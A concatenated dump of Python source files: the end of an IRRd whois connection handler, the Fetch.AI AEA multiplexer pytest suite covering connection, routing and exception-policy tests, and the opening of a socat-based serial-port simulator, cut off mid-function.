self.request.shutdown(socket.SHUT_WR) except OSError: # pragma: no cover pass # some platforms may raise ENOTCONN here self.request.close() def handle_connection(self): """ Handle an individual whois client connection. When this method returns, the connection is closed. """ client_ip = self.client_address[0] self.client_str = client_ip + ':' + str(self.client_address[1]) setproctitle(f'irrd-whois-worker-{self.client_str}') if not self.is_client_permitted(client_ip): self.wfile.write(b'%% Access denied') return self.query_parser = WhoisQueryParser(client_ip, self.client_str, self.preloader, self.database_handler) data = True while data: timer = threading.Timer(self.query_parser.timeout, self.close_request) timer.start() data = self.rfile.readline() timer.cancel() query = data.decode('utf-8', errors='backslashreplace').strip() if not query: continue logger.debug(f'{self.client_str}: processing query: {query}') if not self.handle_query(query): return def handle_query(self, query: str) -> bool: """ Handle an individual query. Returns False when the connection should be closed, True when more queries should be read. """ start_time = time.perf_counter() if query.upper() == '!Q': logger.debug(f'{self.client_str}: closed connection per request') return False response = self.query_parser.handle_query(query) response_bytes = response.generate_response().encode('utf-8') try: self.wfile.write(response_bytes) except OSError: return False elapsed = time.perf_counter() - start_time logger.info(f'{self.client_str}: sent answer to query, elapsed {elapsed:.9f}s, ' f'{len(response_bytes)} bytes: {query}') if not self.query_parser.multiple_command_mode: logger.debug(f'{self.client_str}: auto-closed connection') return False return True def is_client_permitted(self, ip: str) -> bool: """ Check whether a client is permitted. """ return is_client_permitted(ip, 'server.whois.access_list', default_deny=False)
test_multiplexer.py
# -*- coding: utf-8 -*- # ------------------------------------------------------------------------------ # # Copyright 2018-2019 Fetch.AI Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ------------------------------------------------------------------------------ """This module contains the tests for the Multiplexer.""" import asyncio import logging import os import shutil import sys import tempfile import time import unittest.mock from pathlib import Path from threading import Thread from unittest import mock from unittest.mock import MagicMock, Mock, call, patch import pytest from pexpect.exceptions import EOF # type: ignore import aea from aea.cli.core import cli from aea.configurations.constants import DEFAULT_LEDGER from aea.connections.base import ConnectionStates from aea.helpers.exception_policy import ExceptionPolicyEnum from aea.identity.base import Identity from aea.mail.base import AEAConnectionError, Envelope, EnvelopeContext from aea.multiplexer import AsyncMultiplexer, InBox, Multiplexer, OutBox from aea.test_tools.click_testing import CliRunner from packages.fetchai.connections.local.connection import LocalNode from packages.fetchai.connections.p2p_libp2p.connection import ( PUBLIC_ID as P2P_PUBLIC_ID, ) from packages.fetchai.connections.stub.connection import PUBLIC_ID as STUB_CONNECTION_ID from packages.fetchai.protocols.default.message import DefaultMessage from packages.fetchai.protocols.fipa.message import FipaMessage from .conftest import ( AUTHOR, CLI_LOG_OPTION, ROOT_DIR, UNKNOWN_CONNECTION_PUBLIC_ID, UNKNOWN_PROTOCOL_PUBLIC_ID, _make_dummy_connection, _make_local_connection, _make_stub_connection, logger, ) from tests.common.pexpect_popen import PexpectWrapper from tests.common.utils import wait_for_condition UnknownProtocolMock = Mock() UnknownProtocolMock.protocol_id = UNKNOWN_PROTOCOL_PUBLIC_ID UnknownProtocolMock.protocol_specification_id = UNKNOWN_PROTOCOL_PUBLIC_ID @pytest.mark.asyncio async def test_receiving_loop_terminated(): """Test that connecting twice the multiplexer behaves correctly.""" multiplexer = Multiplexer([_make_dummy_connection()]) multiplexer.connect() with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug: multiplexer.connection_status.set(ConnectionStates.disconnected) await multiplexer._receiving_loop() mock_logger_debug.assert_called_with("Receiving loop terminated.") multiplexer.connection_status.set(ConnectionStates.connected) multiplexer.disconnect() def test_connect_twice(): """Test that connecting twice the multiplexer behaves correctly.""" multiplexer = Multiplexer([_make_dummy_connection()]) assert not multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected multiplexer.disconnect() def test_disconnect_twice(): """Test that connecting twice the multiplexer behaves correctly.""" multiplexer = Multiplexer([_make_dummy_connection()]) assert not multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected multiplexer.disconnect() multiplexer.disconnect() def test_connect_twice_with_loop(): """Test that connecting twice the multiplexer behaves correctly.""" running_loop = asyncio.new_event_loop() thread_loop = Thread(target=running_loop.run_forever) thread_loop.start() try: multiplexer = Multiplexer([_make_dummy_connection()], loop=running_loop) with unittest.mock.patch.object( multiplexer.logger, "debug" ) as mock_logger_debug: assert not multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected mock_logger_debug.assert_called_with("Multiplexer already connected.") multiplexer.disconnect() running_loop.call_soon_threadsafe(running_loop.stop) finally: thread_loop.join() @pytest.mark.asyncio async def test_connect_twice_a_single_connection(): """Test that connecting twice a single connection behaves correctly.""" connection = _make_dummy_connection() multiplexer = Multiplexer([connection]) assert not multiplexer.connection_status.is_connected await multiplexer._connect_one(connection.connection_id) with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug: await multiplexer._connect_one(connection.connection_id) mock_logger_debug.assert_called_with( "Connection fetchai/dummy:0.1.0 already established." ) await multiplexer._disconnect_one(connection.connection_id) @pytest.mark.asyncio async def test_run_bad_conneect(): """Test that connecting twice a single connection behaves correctly.""" connection = _make_dummy_connection() multiplexer = AsyncMultiplexer([connection]) f = asyncio.Future() f.set_result(None) with unittest.mock.patch.object(multiplexer, "connect", return_value=f): with pytest.raises(ValueError, match="Multiplexer is not connected properly."): await multiplexer.run() def test_multiplexer_connect_all_raises_error(): """Test the case when the multiplexer raises an exception while connecting.""" multiplexer = Multiplexer([_make_dummy_connection()]) with unittest.mock.patch.object(multiplexer, "_connect_all", side_effect=Exception): with pytest.raises( AEAConnectionError, match="Failed to connect the multiplexer." ): multiplexer.connect() multiplexer.disconnect() def test_multiplexer_connect_one_raises_error_many_connections(): """Test the case when the multiplexer raises an exception while attempting the connection of one connection.""" node = LocalNode() tmpdir = Path(tempfile.mkdtemp()) d = tmpdir / "test_stub" d.mkdir(parents=True) input_file_path = d / "input_file.csv" output_file_path = d / "input_file.csv" connection_1 = _make_local_connection("my_addr", node) connection_2 = _make_stub_connection(input_file_path, output_file_path) connection_3 = _make_dummy_connection() multiplexer = Multiplexer([connection_1, connection_2, connection_3]) assert not connection_1.is_connected assert not connection_2.is_connected assert not connection_3.is_connected with unittest.mock.patch.object(connection_3, "connect", side_effect=Exception): with pytest.raises( AEAConnectionError, match="Failed to connect the multiplexer." ): multiplexer.connect() assert not connection_1.is_connected assert not connection_2.is_connected assert not connection_3.is_connected multiplexer.disconnect() try: shutil.rmtree(tmpdir) except OSError as e: logger.warning("Couldn't delete {}".format(tmpdir)) logger.exception(e) @pytest.mark.asyncio async def test_disconnect_twice_a_single_connection(): """Test that connecting twice a single connection behaves correctly.""" connection = _make_dummy_connection() multiplexer = Multiplexer([_make_dummy_connection()]) assert not multiplexer.connection_status.is_connected with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug: await multiplexer._disconnect_one(connection.connection_id) mock_logger_debug.assert_called_with( "Connection fetchai/dummy:0.1.0 already disconnected." ) def test_multiplexer_disconnect_all_raises_error(): """Test the case when the multiplexer raises an exception while disconnecting.""" multiplexer = Multiplexer([_make_dummy_connection()]) multiplexer.connect() assert multiplexer.connection_status.is_connected with unittest.mock.patch.object( multiplexer, "_disconnect_all", side_effect=Exception ): with pytest.raises( AEAConnectionError, match="Failed to disconnect the multiplexer." ): multiplexer.disconnect() # # do the true disconnection - for clean the test up assert multiplexer.connection_status.is_disconnecting multiplexer.disconnect() assert multiplexer.connection_status.is_disconnected @pytest.mark.asyncio async def test_multiplexer_disconnect_one_raises_error_many_connections(): """Test the case when the multiplexer raises an exception while attempting the disconnection of one connection.""" with LocalNode() as node: tmpdir = Path(tempfile.mkdtemp()) d = tmpdir / "test_stub" d.mkdir(parents=True) input_file_path = d / "input_file.csv" output_file_path = d / "input_file.csv" connection_1 = _make_local_connection("my_addr", node) connection_2 = _make_stub_connection(input_file_path, output_file_path) connection_3 = _make_dummy_connection() multiplexer = Multiplexer([connection_1, connection_2, connection_3]) assert not connection_1.is_connected assert not connection_2.is_connected assert not connection_3.is_connected multiplexer.connect() assert connection_1.is_connected assert connection_2.is_connected assert connection_3.is_connected with unittest.mock.patch.object( connection_3, "disconnect", side_effect=Exception ): with pytest.raises( AEAConnectionError, match="Failed to disconnect the multiplexer." ): multiplexer.disconnect() assert not connection_1.is_connected assert not connection_2.is_connected assert connection_3.is_connected # clean the test up. await connection_3.disconnect() multiplexer.disconnect() try: shutil.rmtree(tmpdir) except OSError as e: logger.warning("Couldn't delete {}".format(tmpdir)) logger.exception(e) @pytest.mark.asyncio async def test_sending_loop_does_not_start_if_multiplexer_not_connected(): """Test that the sending loop is stopped does not start if the multiplexer is not connected.""" multiplexer = Multiplexer([_make_dummy_connection()]) with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug: await multiplexer._send_loop() mock_logger_debug.assert_called_with( "Sending loop not started. The multiplexer is not connected." ) @pytest.mark.asyncio async def test_sending_loop_cancelled(): """Test the case when the sending loop is cancelled.""" multiplexer = Multiplexer([_make_dummy_connection()]) multiplexer.connect() await asyncio.sleep(0.1) with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug: multiplexer.disconnect() mock_logger_debug.assert_any_call("Sending loop cancelled.") @pytest.mark.asyncio async def test_receiving_loop_raises_exception(): """Test the case when an error occurs when a receive is started.""" connection = _make_dummy_connection() multiplexer = Multiplexer([connection]) with unittest.mock.patch("asyncio.wait", side_effect=Exception("a weird error.")): with unittest.mock.patch.object( multiplexer.logger, "error" ) as mock_logger_error: multiplexer.connect() time.sleep(0.1) mock_logger_error.assert_called_with( "Error in the receiving loop: a weird error.", exc_info=True ) multiplexer.disconnect() @pytest.mark.asyncio async def test_send_envelope_with_non_registered_connection(): """Test that sending an envelope with an unregistered connection raises an exception.""" connection = _make_dummy_connection() multiplexer = Multiplexer([connection], protocols=[DefaultProtocolMock]) multiplexer.connect() envelope = Envelope( to="", sender="", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", context=EnvelopeContext(connection_id=UNKNOWN_CONNECTION_PUBLIC_ID), ) with unittest.mock.patch.object( multiplexer.logger, "warning" ) as mock_logger_warning: await multiplexer._send(envelope) mock_logger_warning.assert_called_with( f"Dropping envelope, no connection available for sending: {envelope}" ) multiplexer.disconnect() @pytest.mark.asyncio async def test_send_envelope_when_no_connection(): """Test that sending an envelope with no connection logs a warning.""" multiplexer = Multiplexer([], protocols=[DefaultProtocolMock]) multiplexer.connect() envelope = Envelope( to="", sender="", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", ) with unittest.mock.patch.object( multiplexer.logger, "warning" ) as mock_logger_warning: await multiplexer._send(envelope) mock_logger_warning.assert_called_with( f"Dropping envelope, no connection available for sending: {envelope}" ) multiplexer.disconnect() def test_send_envelope_error_is_logged_by_send_loop(): """Test that the AEAConnectionError in the '_send' method is logged by the '_send_loop'.""" connection = _make_dummy_connection() multiplexer = Multiplexer([connection], protocols=[DefaultProtocolMock]) multiplexer.connect() fake_connection_id = UNKNOWN_CONNECTION_PUBLIC_ID envelope = Envelope( to="", sender="", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", context=EnvelopeContext(connection_id=fake_connection_id), ) with unittest.mock.patch.object(multiplexer.logger, "error") as mock_logger_error: multiplexer.put(envelope) time.sleep(0.1) mock_logger_error.assert_called_with( "No connection registered with id: {}".format(fake_connection_id) ) multiplexer.disconnect() def test_get_from_multiplexer_when_empty(): """Test that getting an envelope from the multiplexer when the input queue is empty raises an exception.""" connection = _make_dummy_connection() multiplexer = Multiplexer([connection]) with pytest.raises(aea.mail.base.Empty): multiplexer.get() def test_send_message_no_supported_protocol(): """Test the case when we send an envelope with a specific connection that does not support the protocol.""" with LocalNode() as node: identity_1 = Identity("identity", address="address_1") connection_1 = _make_local_connection( identity_1.address, node, restricted_to_protocols={DefaultMessage.protocol_id}, excluded_protocols={FipaMessage.protocol_id}, ) multiplexer = Multiplexer( [connection_1], protocols=[DefaultMessage, FipaMessage, UnknownProtocolMock] ) multiplexer.connect() with mock.patch.object(multiplexer.logger, "warning") as mock_logger_warning: envelope = Envelope( to=identity_1.address, sender=identity_1.address, protocol_specification_id=FipaMessage.protocol_specification_id, message=b"some bytes", ) multiplexer.put(envelope) time.sleep(0.5) mock_logger_warning.assert_called_with( "Connection {} does not support protocol {}. It is explicitly excluded.".format( connection_1.connection_id, FipaMessage.protocol_id ) ) with mock.patch.object(multiplexer.logger, "warning") as mock_logger_warning: envelope = Envelope( to=identity_1.address, sender=identity_1.address, protocol_specification_id=UnknownProtocolMock.protocol_specification_id, message=b"some bytes", ) multiplexer.put(envelope) time.sleep(0.5) mock_logger_warning.assert_called_with( "Connection {} does not support protocol {}. The connection is restricted to protocols in {}.".format( connection_1.connection_id, UnknownProtocolMock.protocol_id, connection_1.restricted_to_protocols, ) ) multiplexer.disconnect() def test_protocol_not_resolved(): """Test multiplexer raises ValueError on protocol not resolved.""" multiplexer = Multiplexer([Mock()]) envelope = Envelope( to="1", sender="2", protocol_specification_id=FipaMessage.protocol_specification_id, message=b"some bytes", ) with pytest.raises(ValueError): multiplexer._get_protocol_id_for_envelope(envelope) def test_autoset_default_connection(): """Set default connection automatically.""" connection_1 = _make_dummy_connection() connection_2 = _make_dummy_connection() connections = [connection_1, connection_2] multiplexer = Multiplexer(connections) multiplexer._default_connection = None multiplexer._set_default_connection_if_none() assert multiplexer._default_connection == connections[0] def test__get_connection(): """Test the method _get_connection.""" connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = Multiplexer(connections) conn_ = multiplexer._get_connection(connection_1.connection_id.to_any()) assert conn_ == connection_1 @pytest.mark.asyncio async def test_disconnect_when_not_connected(): """Test disconnect when not connected.""" connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer(connections) with patch.object(multiplexer, "_disconnect_all") as disconnect_all_mocked: await multiplexer.disconnect() disconnect_all_mocked.assert_not_called() @pytest.mark.asyncio async def test_exit_on_none_envelope(): """Test sending task exit on None envelope.""" connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop()) try: await multiplexer.connect() assert multiplexer.is_connected multiplexer.put(None) await asyncio.sleep(0.5) assert multiplexer._send_loop_task.done() finally: await multiplexer.disconnect() @pytest.mark.asyncio async def test_inbox_outbox(): """Test InBox OutBox objects.""" connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop()) msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",) msg.to = "to" msg.sender = "sender" envelope = Envelope(to="to", sender="sender", message=msg,) try: await multiplexer.connect() inbox = InBox(multiplexer) outbox = OutBox(multiplexer) assert inbox.empty() assert outbox.empty() outbox.put(envelope) received = await inbox.async_get() assert received == envelope assert inbox.empty() assert outbox.empty() outbox.put_message(msg) await inbox.async_wait() received = inbox.get_nowait() assert received == envelope finally: await multiplexer.disconnect() @pytest.mark.asyncio async def test_threaded_mode(): """Test InBox OutBox objects in threaded mode.""" connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer(connections, threaded=True) msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",) msg.to = "to" msg.sender = "sender" envelope = Envelope(to="to", sender="sender", message=msg) try: await multiplexer.connect() await asyncio.sleep(0.5) inbox = InBox(multiplexer) outbox = OutBox(multiplexer) assert inbox.empty() assert outbox.empty() outbox.put(envelope) received = await inbox.async_get() assert received == envelope assert inbox.empty() assert outbox.empty() outbox.put_message(msg) await inbox.async_wait() received = inbox.get_nowait() assert received == envelope finally: await multiplexer.disconnect() @pytest.mark.asyncio async def test_outbox_negative(): """Test InBox OutBox objects.""" connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer(connections, loop=asyncio.get_event_loop()) msg = DefaultMessage(performative=DefaultMessage.Performative.BYTES, content=b"",) context = EnvelopeContext(connection_id=connection_1.connection_id) envelope = Envelope( to="to", sender="sender", protocol_specification_id=msg.protocol_specification_id, message=b"", context=context, ) try: await multiplexer.connect() outbox = OutBox(multiplexer) assert outbox.empty() with pytest.raises(ValueError) as execinfo: outbox.put(envelope) assert ( str(execinfo.value) == "Only Message type allowed in envelope message field when putting into outbox." ) assert outbox.empty() with pytest.raises(ValueError) as execinfo: outbox.put_message("") assert str(execinfo.value) == "Provided message not of type Message." assert outbox.empty() with pytest.raises(ValueError) as execinfo: outbox.put_message(msg) assert str(execinfo.value) == "Provided message has message.to not set." assert outbox.empty() msg.to = "to" with pytest.raises(ValueError) as execinfo: outbox.put_message(msg) assert str(execinfo.value) == "Provided message has message.sender not set." finally: await multiplexer.disconnect() DefaultProtocolMock = Mock() DefaultProtocolMock.protocol_id = DefaultMessage.protocol_id DefaultProtocolMock.protocol_specification_id = DefaultMessage.protocol_specification_id @pytest.mark.asyncio async def test_default_route_applied(caplog): """Test default route is selected automatically.""" logger = logging.getLogger("aea.multiplexer") with caplog.at_level(logging.DEBUG, logger="aea.multiplexer"): connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer( connections, loop=asyncio.get_event_loop(), protocols=[DefaultProtocolMock] ) multiplexer.logger = logger envelope = Envelope( to="", sender="", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", context=EnvelopeContext(), ) multiplexer.default_routing = { DefaultMessage.protocol_id: connection_1.connection_id } try: await multiplexer.connect() inbox = InBox(multiplexer) outbox = InBox(multiplexer) assert inbox.empty() assert outbox.empty() multiplexer.put(envelope) await outbox.async_get() finally: await multiplexer.disconnect() assert "Using default routing:" in caplog.text @pytest.mark.asyncio async def test_connection_id_in_to_field_detected(caplog): """Test to field is parsed correctly and used for routing.""" logger = logging.getLogger("aea.multiplexer") with caplog.at_level(logging.DEBUG, logger="aea.multiplexer"): connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer( connections, loop=asyncio.get_event_loop(), protocols=[DefaultProtocolMock] ) multiplexer.logger = logger envelope = Envelope( to=str(connection_1.connection_id), sender="some_author/some_skill:0.1.0", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", ) try: await multiplexer.connect() inbox = InBox(multiplexer) outbox = InBox(multiplexer) assert inbox.empty() assert outbox.empty() multiplexer.put(envelope) await outbox.async_get() finally: await multiplexer.disconnect() assert "Using envelope `to` field as connection_id:" in caplog.text @pytest.mark.asyncio async def test_routing_helper_applied(caplog): """Test the routing helper is used for routing.""" logger = logging.getLogger("aea.multiplexer") with caplog.at_level(logging.DEBUG, logger="aea.multiplexer"): connection_1 = _make_dummy_connection() connections = [connection_1] multiplexer = AsyncMultiplexer( connections, loop=asyncio.get_event_loop(), protocols=[DefaultProtocolMock] ) multiplexer.logger = logger envelope = Envelope( to="test", sender="", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", ) multiplexer._routing_helper[envelope.to] = connection_1.connection_id try: await multiplexer.connect() inbox = InBox(multiplexer) outbox = InBox(multiplexer) assert inbox.empty() assert outbox.empty() multiplexer.put(envelope) await outbox.async_get() finally: await multiplexer.disconnect() assert ( f"Using routing helper with connection_id: {connection_1.connection_id}" in caplog.text ) def test_multiplexer_setup(): """Test multiplexer setup to set connections.""" node = LocalNode() tmpdir = Path(tempfile.mkdtemp()) d = tmpdir / "test_stub" d.mkdir(parents=True) input_file_path = d / "input_file.csv" output_file_path = d / "input_file.csv" connection_1 = _make_local_connection("my_addr", node) connection_2 = _make_stub_connection(input_file_path, output_file_path) connection_3 = _make_dummy_connection() connections = [connection_1, connection_2, connection_3] multiplexer = Multiplexer([]) with unittest.mock.patch.object(multiplexer.logger, "debug") as mock_logger_debug: multiplexer._connection_consistency_checks() mock_logger_debug.assert_called_with("List of connections is empty.") multiplexer._setup(connections, default_routing=None) multiplexer._connection_consistency_checks() class TestExceptionHandlingOnConnectionSend: """Test exception handling policy on connection.send.""" def setup(self): """Set up test case.""" self.connection = _make_dummy_connection() self.multiplexer = Multiplexer( [self.connection], protocols=[DefaultProtocolMock] ) self.multiplexer.connect() self.envelope = Envelope( to="", sender="", protocol_specification_id=DefaultMessage.protocol_specification_id, message=b"", context=EnvelopeContext(connection_id=self.connection.connection_id), ) self.exception = ValueError("expected") def teardown(self): """Tear down test case.""" self.multiplexer.disconnect() def test_log_policy(self): """Test just log exception.""" with patch.object(self.connection, "send", side_effect=self.exception): self.multiplexer._exception_policy = ExceptionPolicyEnum.just_log self.multiplexer.put(self.envelope) time.sleep(1) assert not self.multiplexer._send_loop_task.done() def test_propagate_policy(self): """Test propagate exception.""" assert self.multiplexer._exception_policy == ExceptionPolicyEnum.propagate with patch.object(self.connection, "send", side_effect=self.exception): self.multiplexer.put(self.envelope) time.sleep(1) wait_for_condition( lambda: self.multiplexer._send_loop_task.done(), timeout=5 ) assert self.multiplexer._send_loop_task.exception() == self.exception def test_stop_policy(self): """Test stop multiplexer on exception.""" with patch.object(self.connection, "send", side_effect=self.exception): self.multiplexer._exception_policy = ExceptionPolicyEnum.stop_and_exit self.multiplexer.put(self.envelope) time.sleep(1) wait_for_condition( lambda: self.multiplexer.connection_status.is_disconnected, timeout=5 ) def test_disconnect_order(self): """Test disconnect order: tasks first, disconnect_all next.""" parent = MagicMock() async def fn(): return with patch.object( self.multiplexer, "_stop_receive_send_loops", return_value=fn() ) as stop_loops, patch.object( self.multiplexer, "_disconnect_all", return_value=fn() ) as disconnect_all, patch.object( self.multiplexer, "_check_and_set_disconnected_state" ) as check_and_set_disconnected_state: parent.attach_mock(stop_loops, "stop_loops") parent.attach_mock(disconnect_all, "disconnect_all") parent.attach_mock( check_and_set_disconnected_state, "check_and_set_disconnected_state" ) self.multiplexer.disconnect() assert parent.mock_calls == [ call.stop_loops(), call.disconnect_all(), call.check_and_set_disconnected_state(), ] class TestMultiplexerDisconnectsOnTermination: # pylint: disable=attribute-defined-outside-init """Test multiplexer disconnects on agent process keyboard interrupted.""" def setup(self): """Set the test up.""" self.proc = None self.runner = CliRunner() self.agent_name = "myagent" self.cwd = os.getcwd() self.t = tempfile.mkdtemp() shutil.copytree(Path(ROOT_DIR, "packages"), Path(self.t, "packages")) os.chdir(self.t) self.key_path = os.path.join(self.t, "fetchai_private_key.txt") self.conn_key_path = os.path.join(self.t, "conn_private_key.txt") result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "init", "--local", "--author", AUTHOR] ) assert result.exit_code == 0 result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "create", "--local", self.agent_name] ) assert result.exit_code == 0 os.chdir(Path(self.t, self.agent_name)) result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "generate-key", DEFAULT_LEDGER, self.key_path] ) assert result.exit_code == 0, result.stdout_bytes result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "add-key", DEFAULT_LEDGER, self.key_path] ) assert result.exit_code == 0, result.stdout_bytes def test_multiplexer_disconnected_on_early_interruption(self): """Test multiplexer disconnected properly on termination before connected.""" result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "add", "--local", "connection", str(P2P_PUBLIC_ID)] ) assert result.exit_code == 0, result.stdout_bytes result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "build"]) assert result.exit_code == 0, result.stdout_bytes result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "generate-key", DEFAULT_LEDGER, self.conn_key_path] ) assert result.exit_code == 0, result.stdout_bytes result = self.runner.invoke( cli, [ *CLI_LOG_OPTION, "add-key", DEFAULT_LEDGER, self.conn_key_path, "--connection", ], ) assert result.exit_code == 0, result.stdout_bytes result = self.runner.invoke(cli, [*CLI_LOG_OPTION, "issue-certificates"]) assert result.exit_code == 0, result.stdout_bytes self.proc = PexpectWrapper( # nosec [sys.executable, "-m", "aea.cli", "-v", "DEBUG", "run"], env=os.environ, maxread=10000, encoding="utf-8", logfile=sys.stdout, ) self.proc.expect_all( ["Starting libp2p node..."], timeout=50, ) self.proc.control_c() self.proc.expect_all( ["Multiplexer .*disconnected."], timeout=20, strict=False, ) self.proc.expect_all( [EOF], timeout=20, ) def test_multiplexer_disconnected_on_termination_after_connected_no_connection( self, ): """Test multiplexer disconnected properly on termination after connected.""" self.proc = PexpectWrapper( # nosec [sys.executable, "-m", "aea.cli", "-v", "DEBUG", "run"], env=os.environ, maxread=10000, encoding="utf-8", logfile=sys.stdout, ) self.proc.expect_all( ["Start processing messages..."], timeout=20, ) self.proc.control_c() self.proc.expect_all( ["Multiplexer disconnecting...", "Multiplexer disconnected.", EOF], timeout=20, ) def test_multiplexer_disconnected_on_termination_after_connected_one_connection( self, ): """Test multiplexer disconnected properly on termination after connected.""" result = self.runner.invoke( cli, [*CLI_LOG_OPTION, "add", "--local", "connection", str(STUB_CONNECTION_ID)], ) assert result.exit_code == 0, result.stdout_bytes self.proc = PexpectWrapper( # nosec [sys.executable, "-m", "aea.cli", "-v", "DEBUG", "run"], env=os.environ, maxread=10000, encoding="utf-8", logfile=sys.stdout, ) self.proc.expect_all( ["Start processing messages..."], timeout=20, ) self.proc.control_c() self.proc.expect_all( ["Multiplexer disconnecting...", "Multiplexer disconnected.", EOF], timeout=20, ) def teardown(self): """Tear the test down.""" if self.proc: self.proc.wait_to_complete(10) os.chdir(self.cwd) try: shutil.rmtree(self.t) except (OSError, IOError): pass def test_multiplexer_setup_replaces_connections(): """Test proper connections reset on setup call.""" m = AsyncMultiplexer([MagicMock(), MagicMock(), MagicMock()]) assert len(m._id_to_connection) == 3 assert len(m._connections) == 3 m._setup([MagicMock()], MagicMock()) assert len(m._id_to_connection) == 1 assert len(m._connections) == 1 def test_connect_after_disconnect_sync(): """Test connect-disconnect-connect again for threaded multiplexer.""" multiplexer = Multiplexer([_make_dummy_connection()]) assert not multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected multiplexer.disconnect() assert not multiplexer.connection_status.is_connected multiplexer.connect() assert multiplexer.connection_status.is_connected multiplexer.disconnect() assert not multiplexer.connection_status.is_connected @pytest.mark.asyncio async def test_connect_after_disconnect_async(): """Test connect-disconnect-connect again for async multiplexer.""" multiplexer = AsyncMultiplexer([_make_dummy_connection()]) assert not multiplexer.connection_status.is_connected await multiplexer.connect() assert multiplexer.connection_status.is_connected await multiplexer.disconnect() assert not multiplexer.connection_status.is_connected await multiplexer.connect() assert multiplexer.connection_status.is_connected await multiplexer.disconnect() assert not multiplexer.connection_status.is_connected @pytest.mark.asyncio async def test_connection_timeouts(): """Test connect,send, disconnect timeouts for connections.""" async def slow_fn(*asrgs, **kwargs): await asyncio.sleep(100) connection = _make_dummy_connection() envelope = Envelope( to="", sender="", message=DefaultMessage(performative=DefaultMessage.Performative.BYTES), context=EnvelopeContext(connection_id=connection.connection_id), ) connection = _make_dummy_connection() connection.connect = slow_fn multiplexer = AsyncMultiplexer([connection]) multiplexer.CONNECT_TIMEOUT = 0.1 with pytest.raises(AEAConnectionError, match=r"TimeoutError"): await multiplexer.connect() connection = _make_dummy_connection() connection.send = slow_fn multiplexer = AsyncMultiplexer([connection]) multiplexer.SEND_TIMEOUT = 0.1 await multiplexer.connect() with pytest.raises(asyncio.TimeoutError): await multiplexer._send(envelope) await multiplexer.disconnect() connection = _make_dummy_connection() connection.disconnect = slow_fn multiplexer = AsyncMultiplexer([connection]) multiplexer.DISCONNECT_TIMEOUT = 0.1 await multiplexer.connect() with pytest.raises( AEAConnectionError, match=f"Failed to disconnect multiplexer, some connections are not disconnected.*{str(connection.connection_id)}", ): await multiplexer.disconnect() @pytest.mark.asyncio async def test_stops_on_connectionerror_during_connect(): """Test multiplexer stopped and reraise exception on connect fails on conection.connect with AEAConnectionError.""" connection = _make_dummy_connection() multiplexer = AsyncMultiplexer([connection]) with patch.object( connection, "connect", side_effect=AEAConnectionError("expected") ): with pytest.raises(AEAConnectionError, match=r"expected"): await multiplexer.connect() assert multiplexer.connection_status.is_disconnected
simulate_serial.py
#!/usr/bin/env python3 import logging import subprocess import sys import threading import time sys.path.append('.') from logger.readers.logfile_reader import LogfileReader from logger.transforms.slice_transform import SliceTransform from logger.writers.text_file_writer import TextFileWriter from logger.utils.read_json import read_json ################################################################################ class SimSerial: """Create a virtual serial port and feed stored logfile data to it.""" ############################ def __init__(self, port, source_file, use_timestamps=True, baudrate=9600, bytesize=8, parity='N', stopbits=1, timeout=None, xonxoff=False, rtscts=False, write_timeout=None, dsrdtr=False, inter_byte_timeout=None, exclusive=None): """Takes source file, whether to deliver data at rate indicated by timestamps, and the standard parameters that a serial port takes.""" self.source_file = source_file self.use_timestamps = use_timestamps # We'll create two virtual ports: 'port' and 'port_in'; we will write # to port_in and read the values back out from port self.read_port = port self.write_port = port + '_in' self.serial_params = {'baudrate': baudrate, 'byteside': bytesize, 'parity': parity, 'stopbits': stopbits, 'timeout': timeout, 'xonxoff': xonxoff, 'rtscts': rtscts, 'write_timeout': write_timeout, 'dsrdtr': dsrdtr, 'inter_byte_timeout': inter_byte_timeout, 'exclusive': exclusive} self.quit = False # Finally, check that our needed 'socat' actually exists if not subprocess.run(['which', 'socat'], stdout=subprocess.PIPE).stdout: raise NameError('Executable "socat" not found on path. Please refer ' 'to installation guide to install socat.') ############################ def _run_socat(self): """Internal: run the actual command.""" verbose = '-d' write_port_params = 'pty,link=%s,raw,echo=0' % self.write_port read_port_params = 'pty,link=%s,raw,echo=0' % 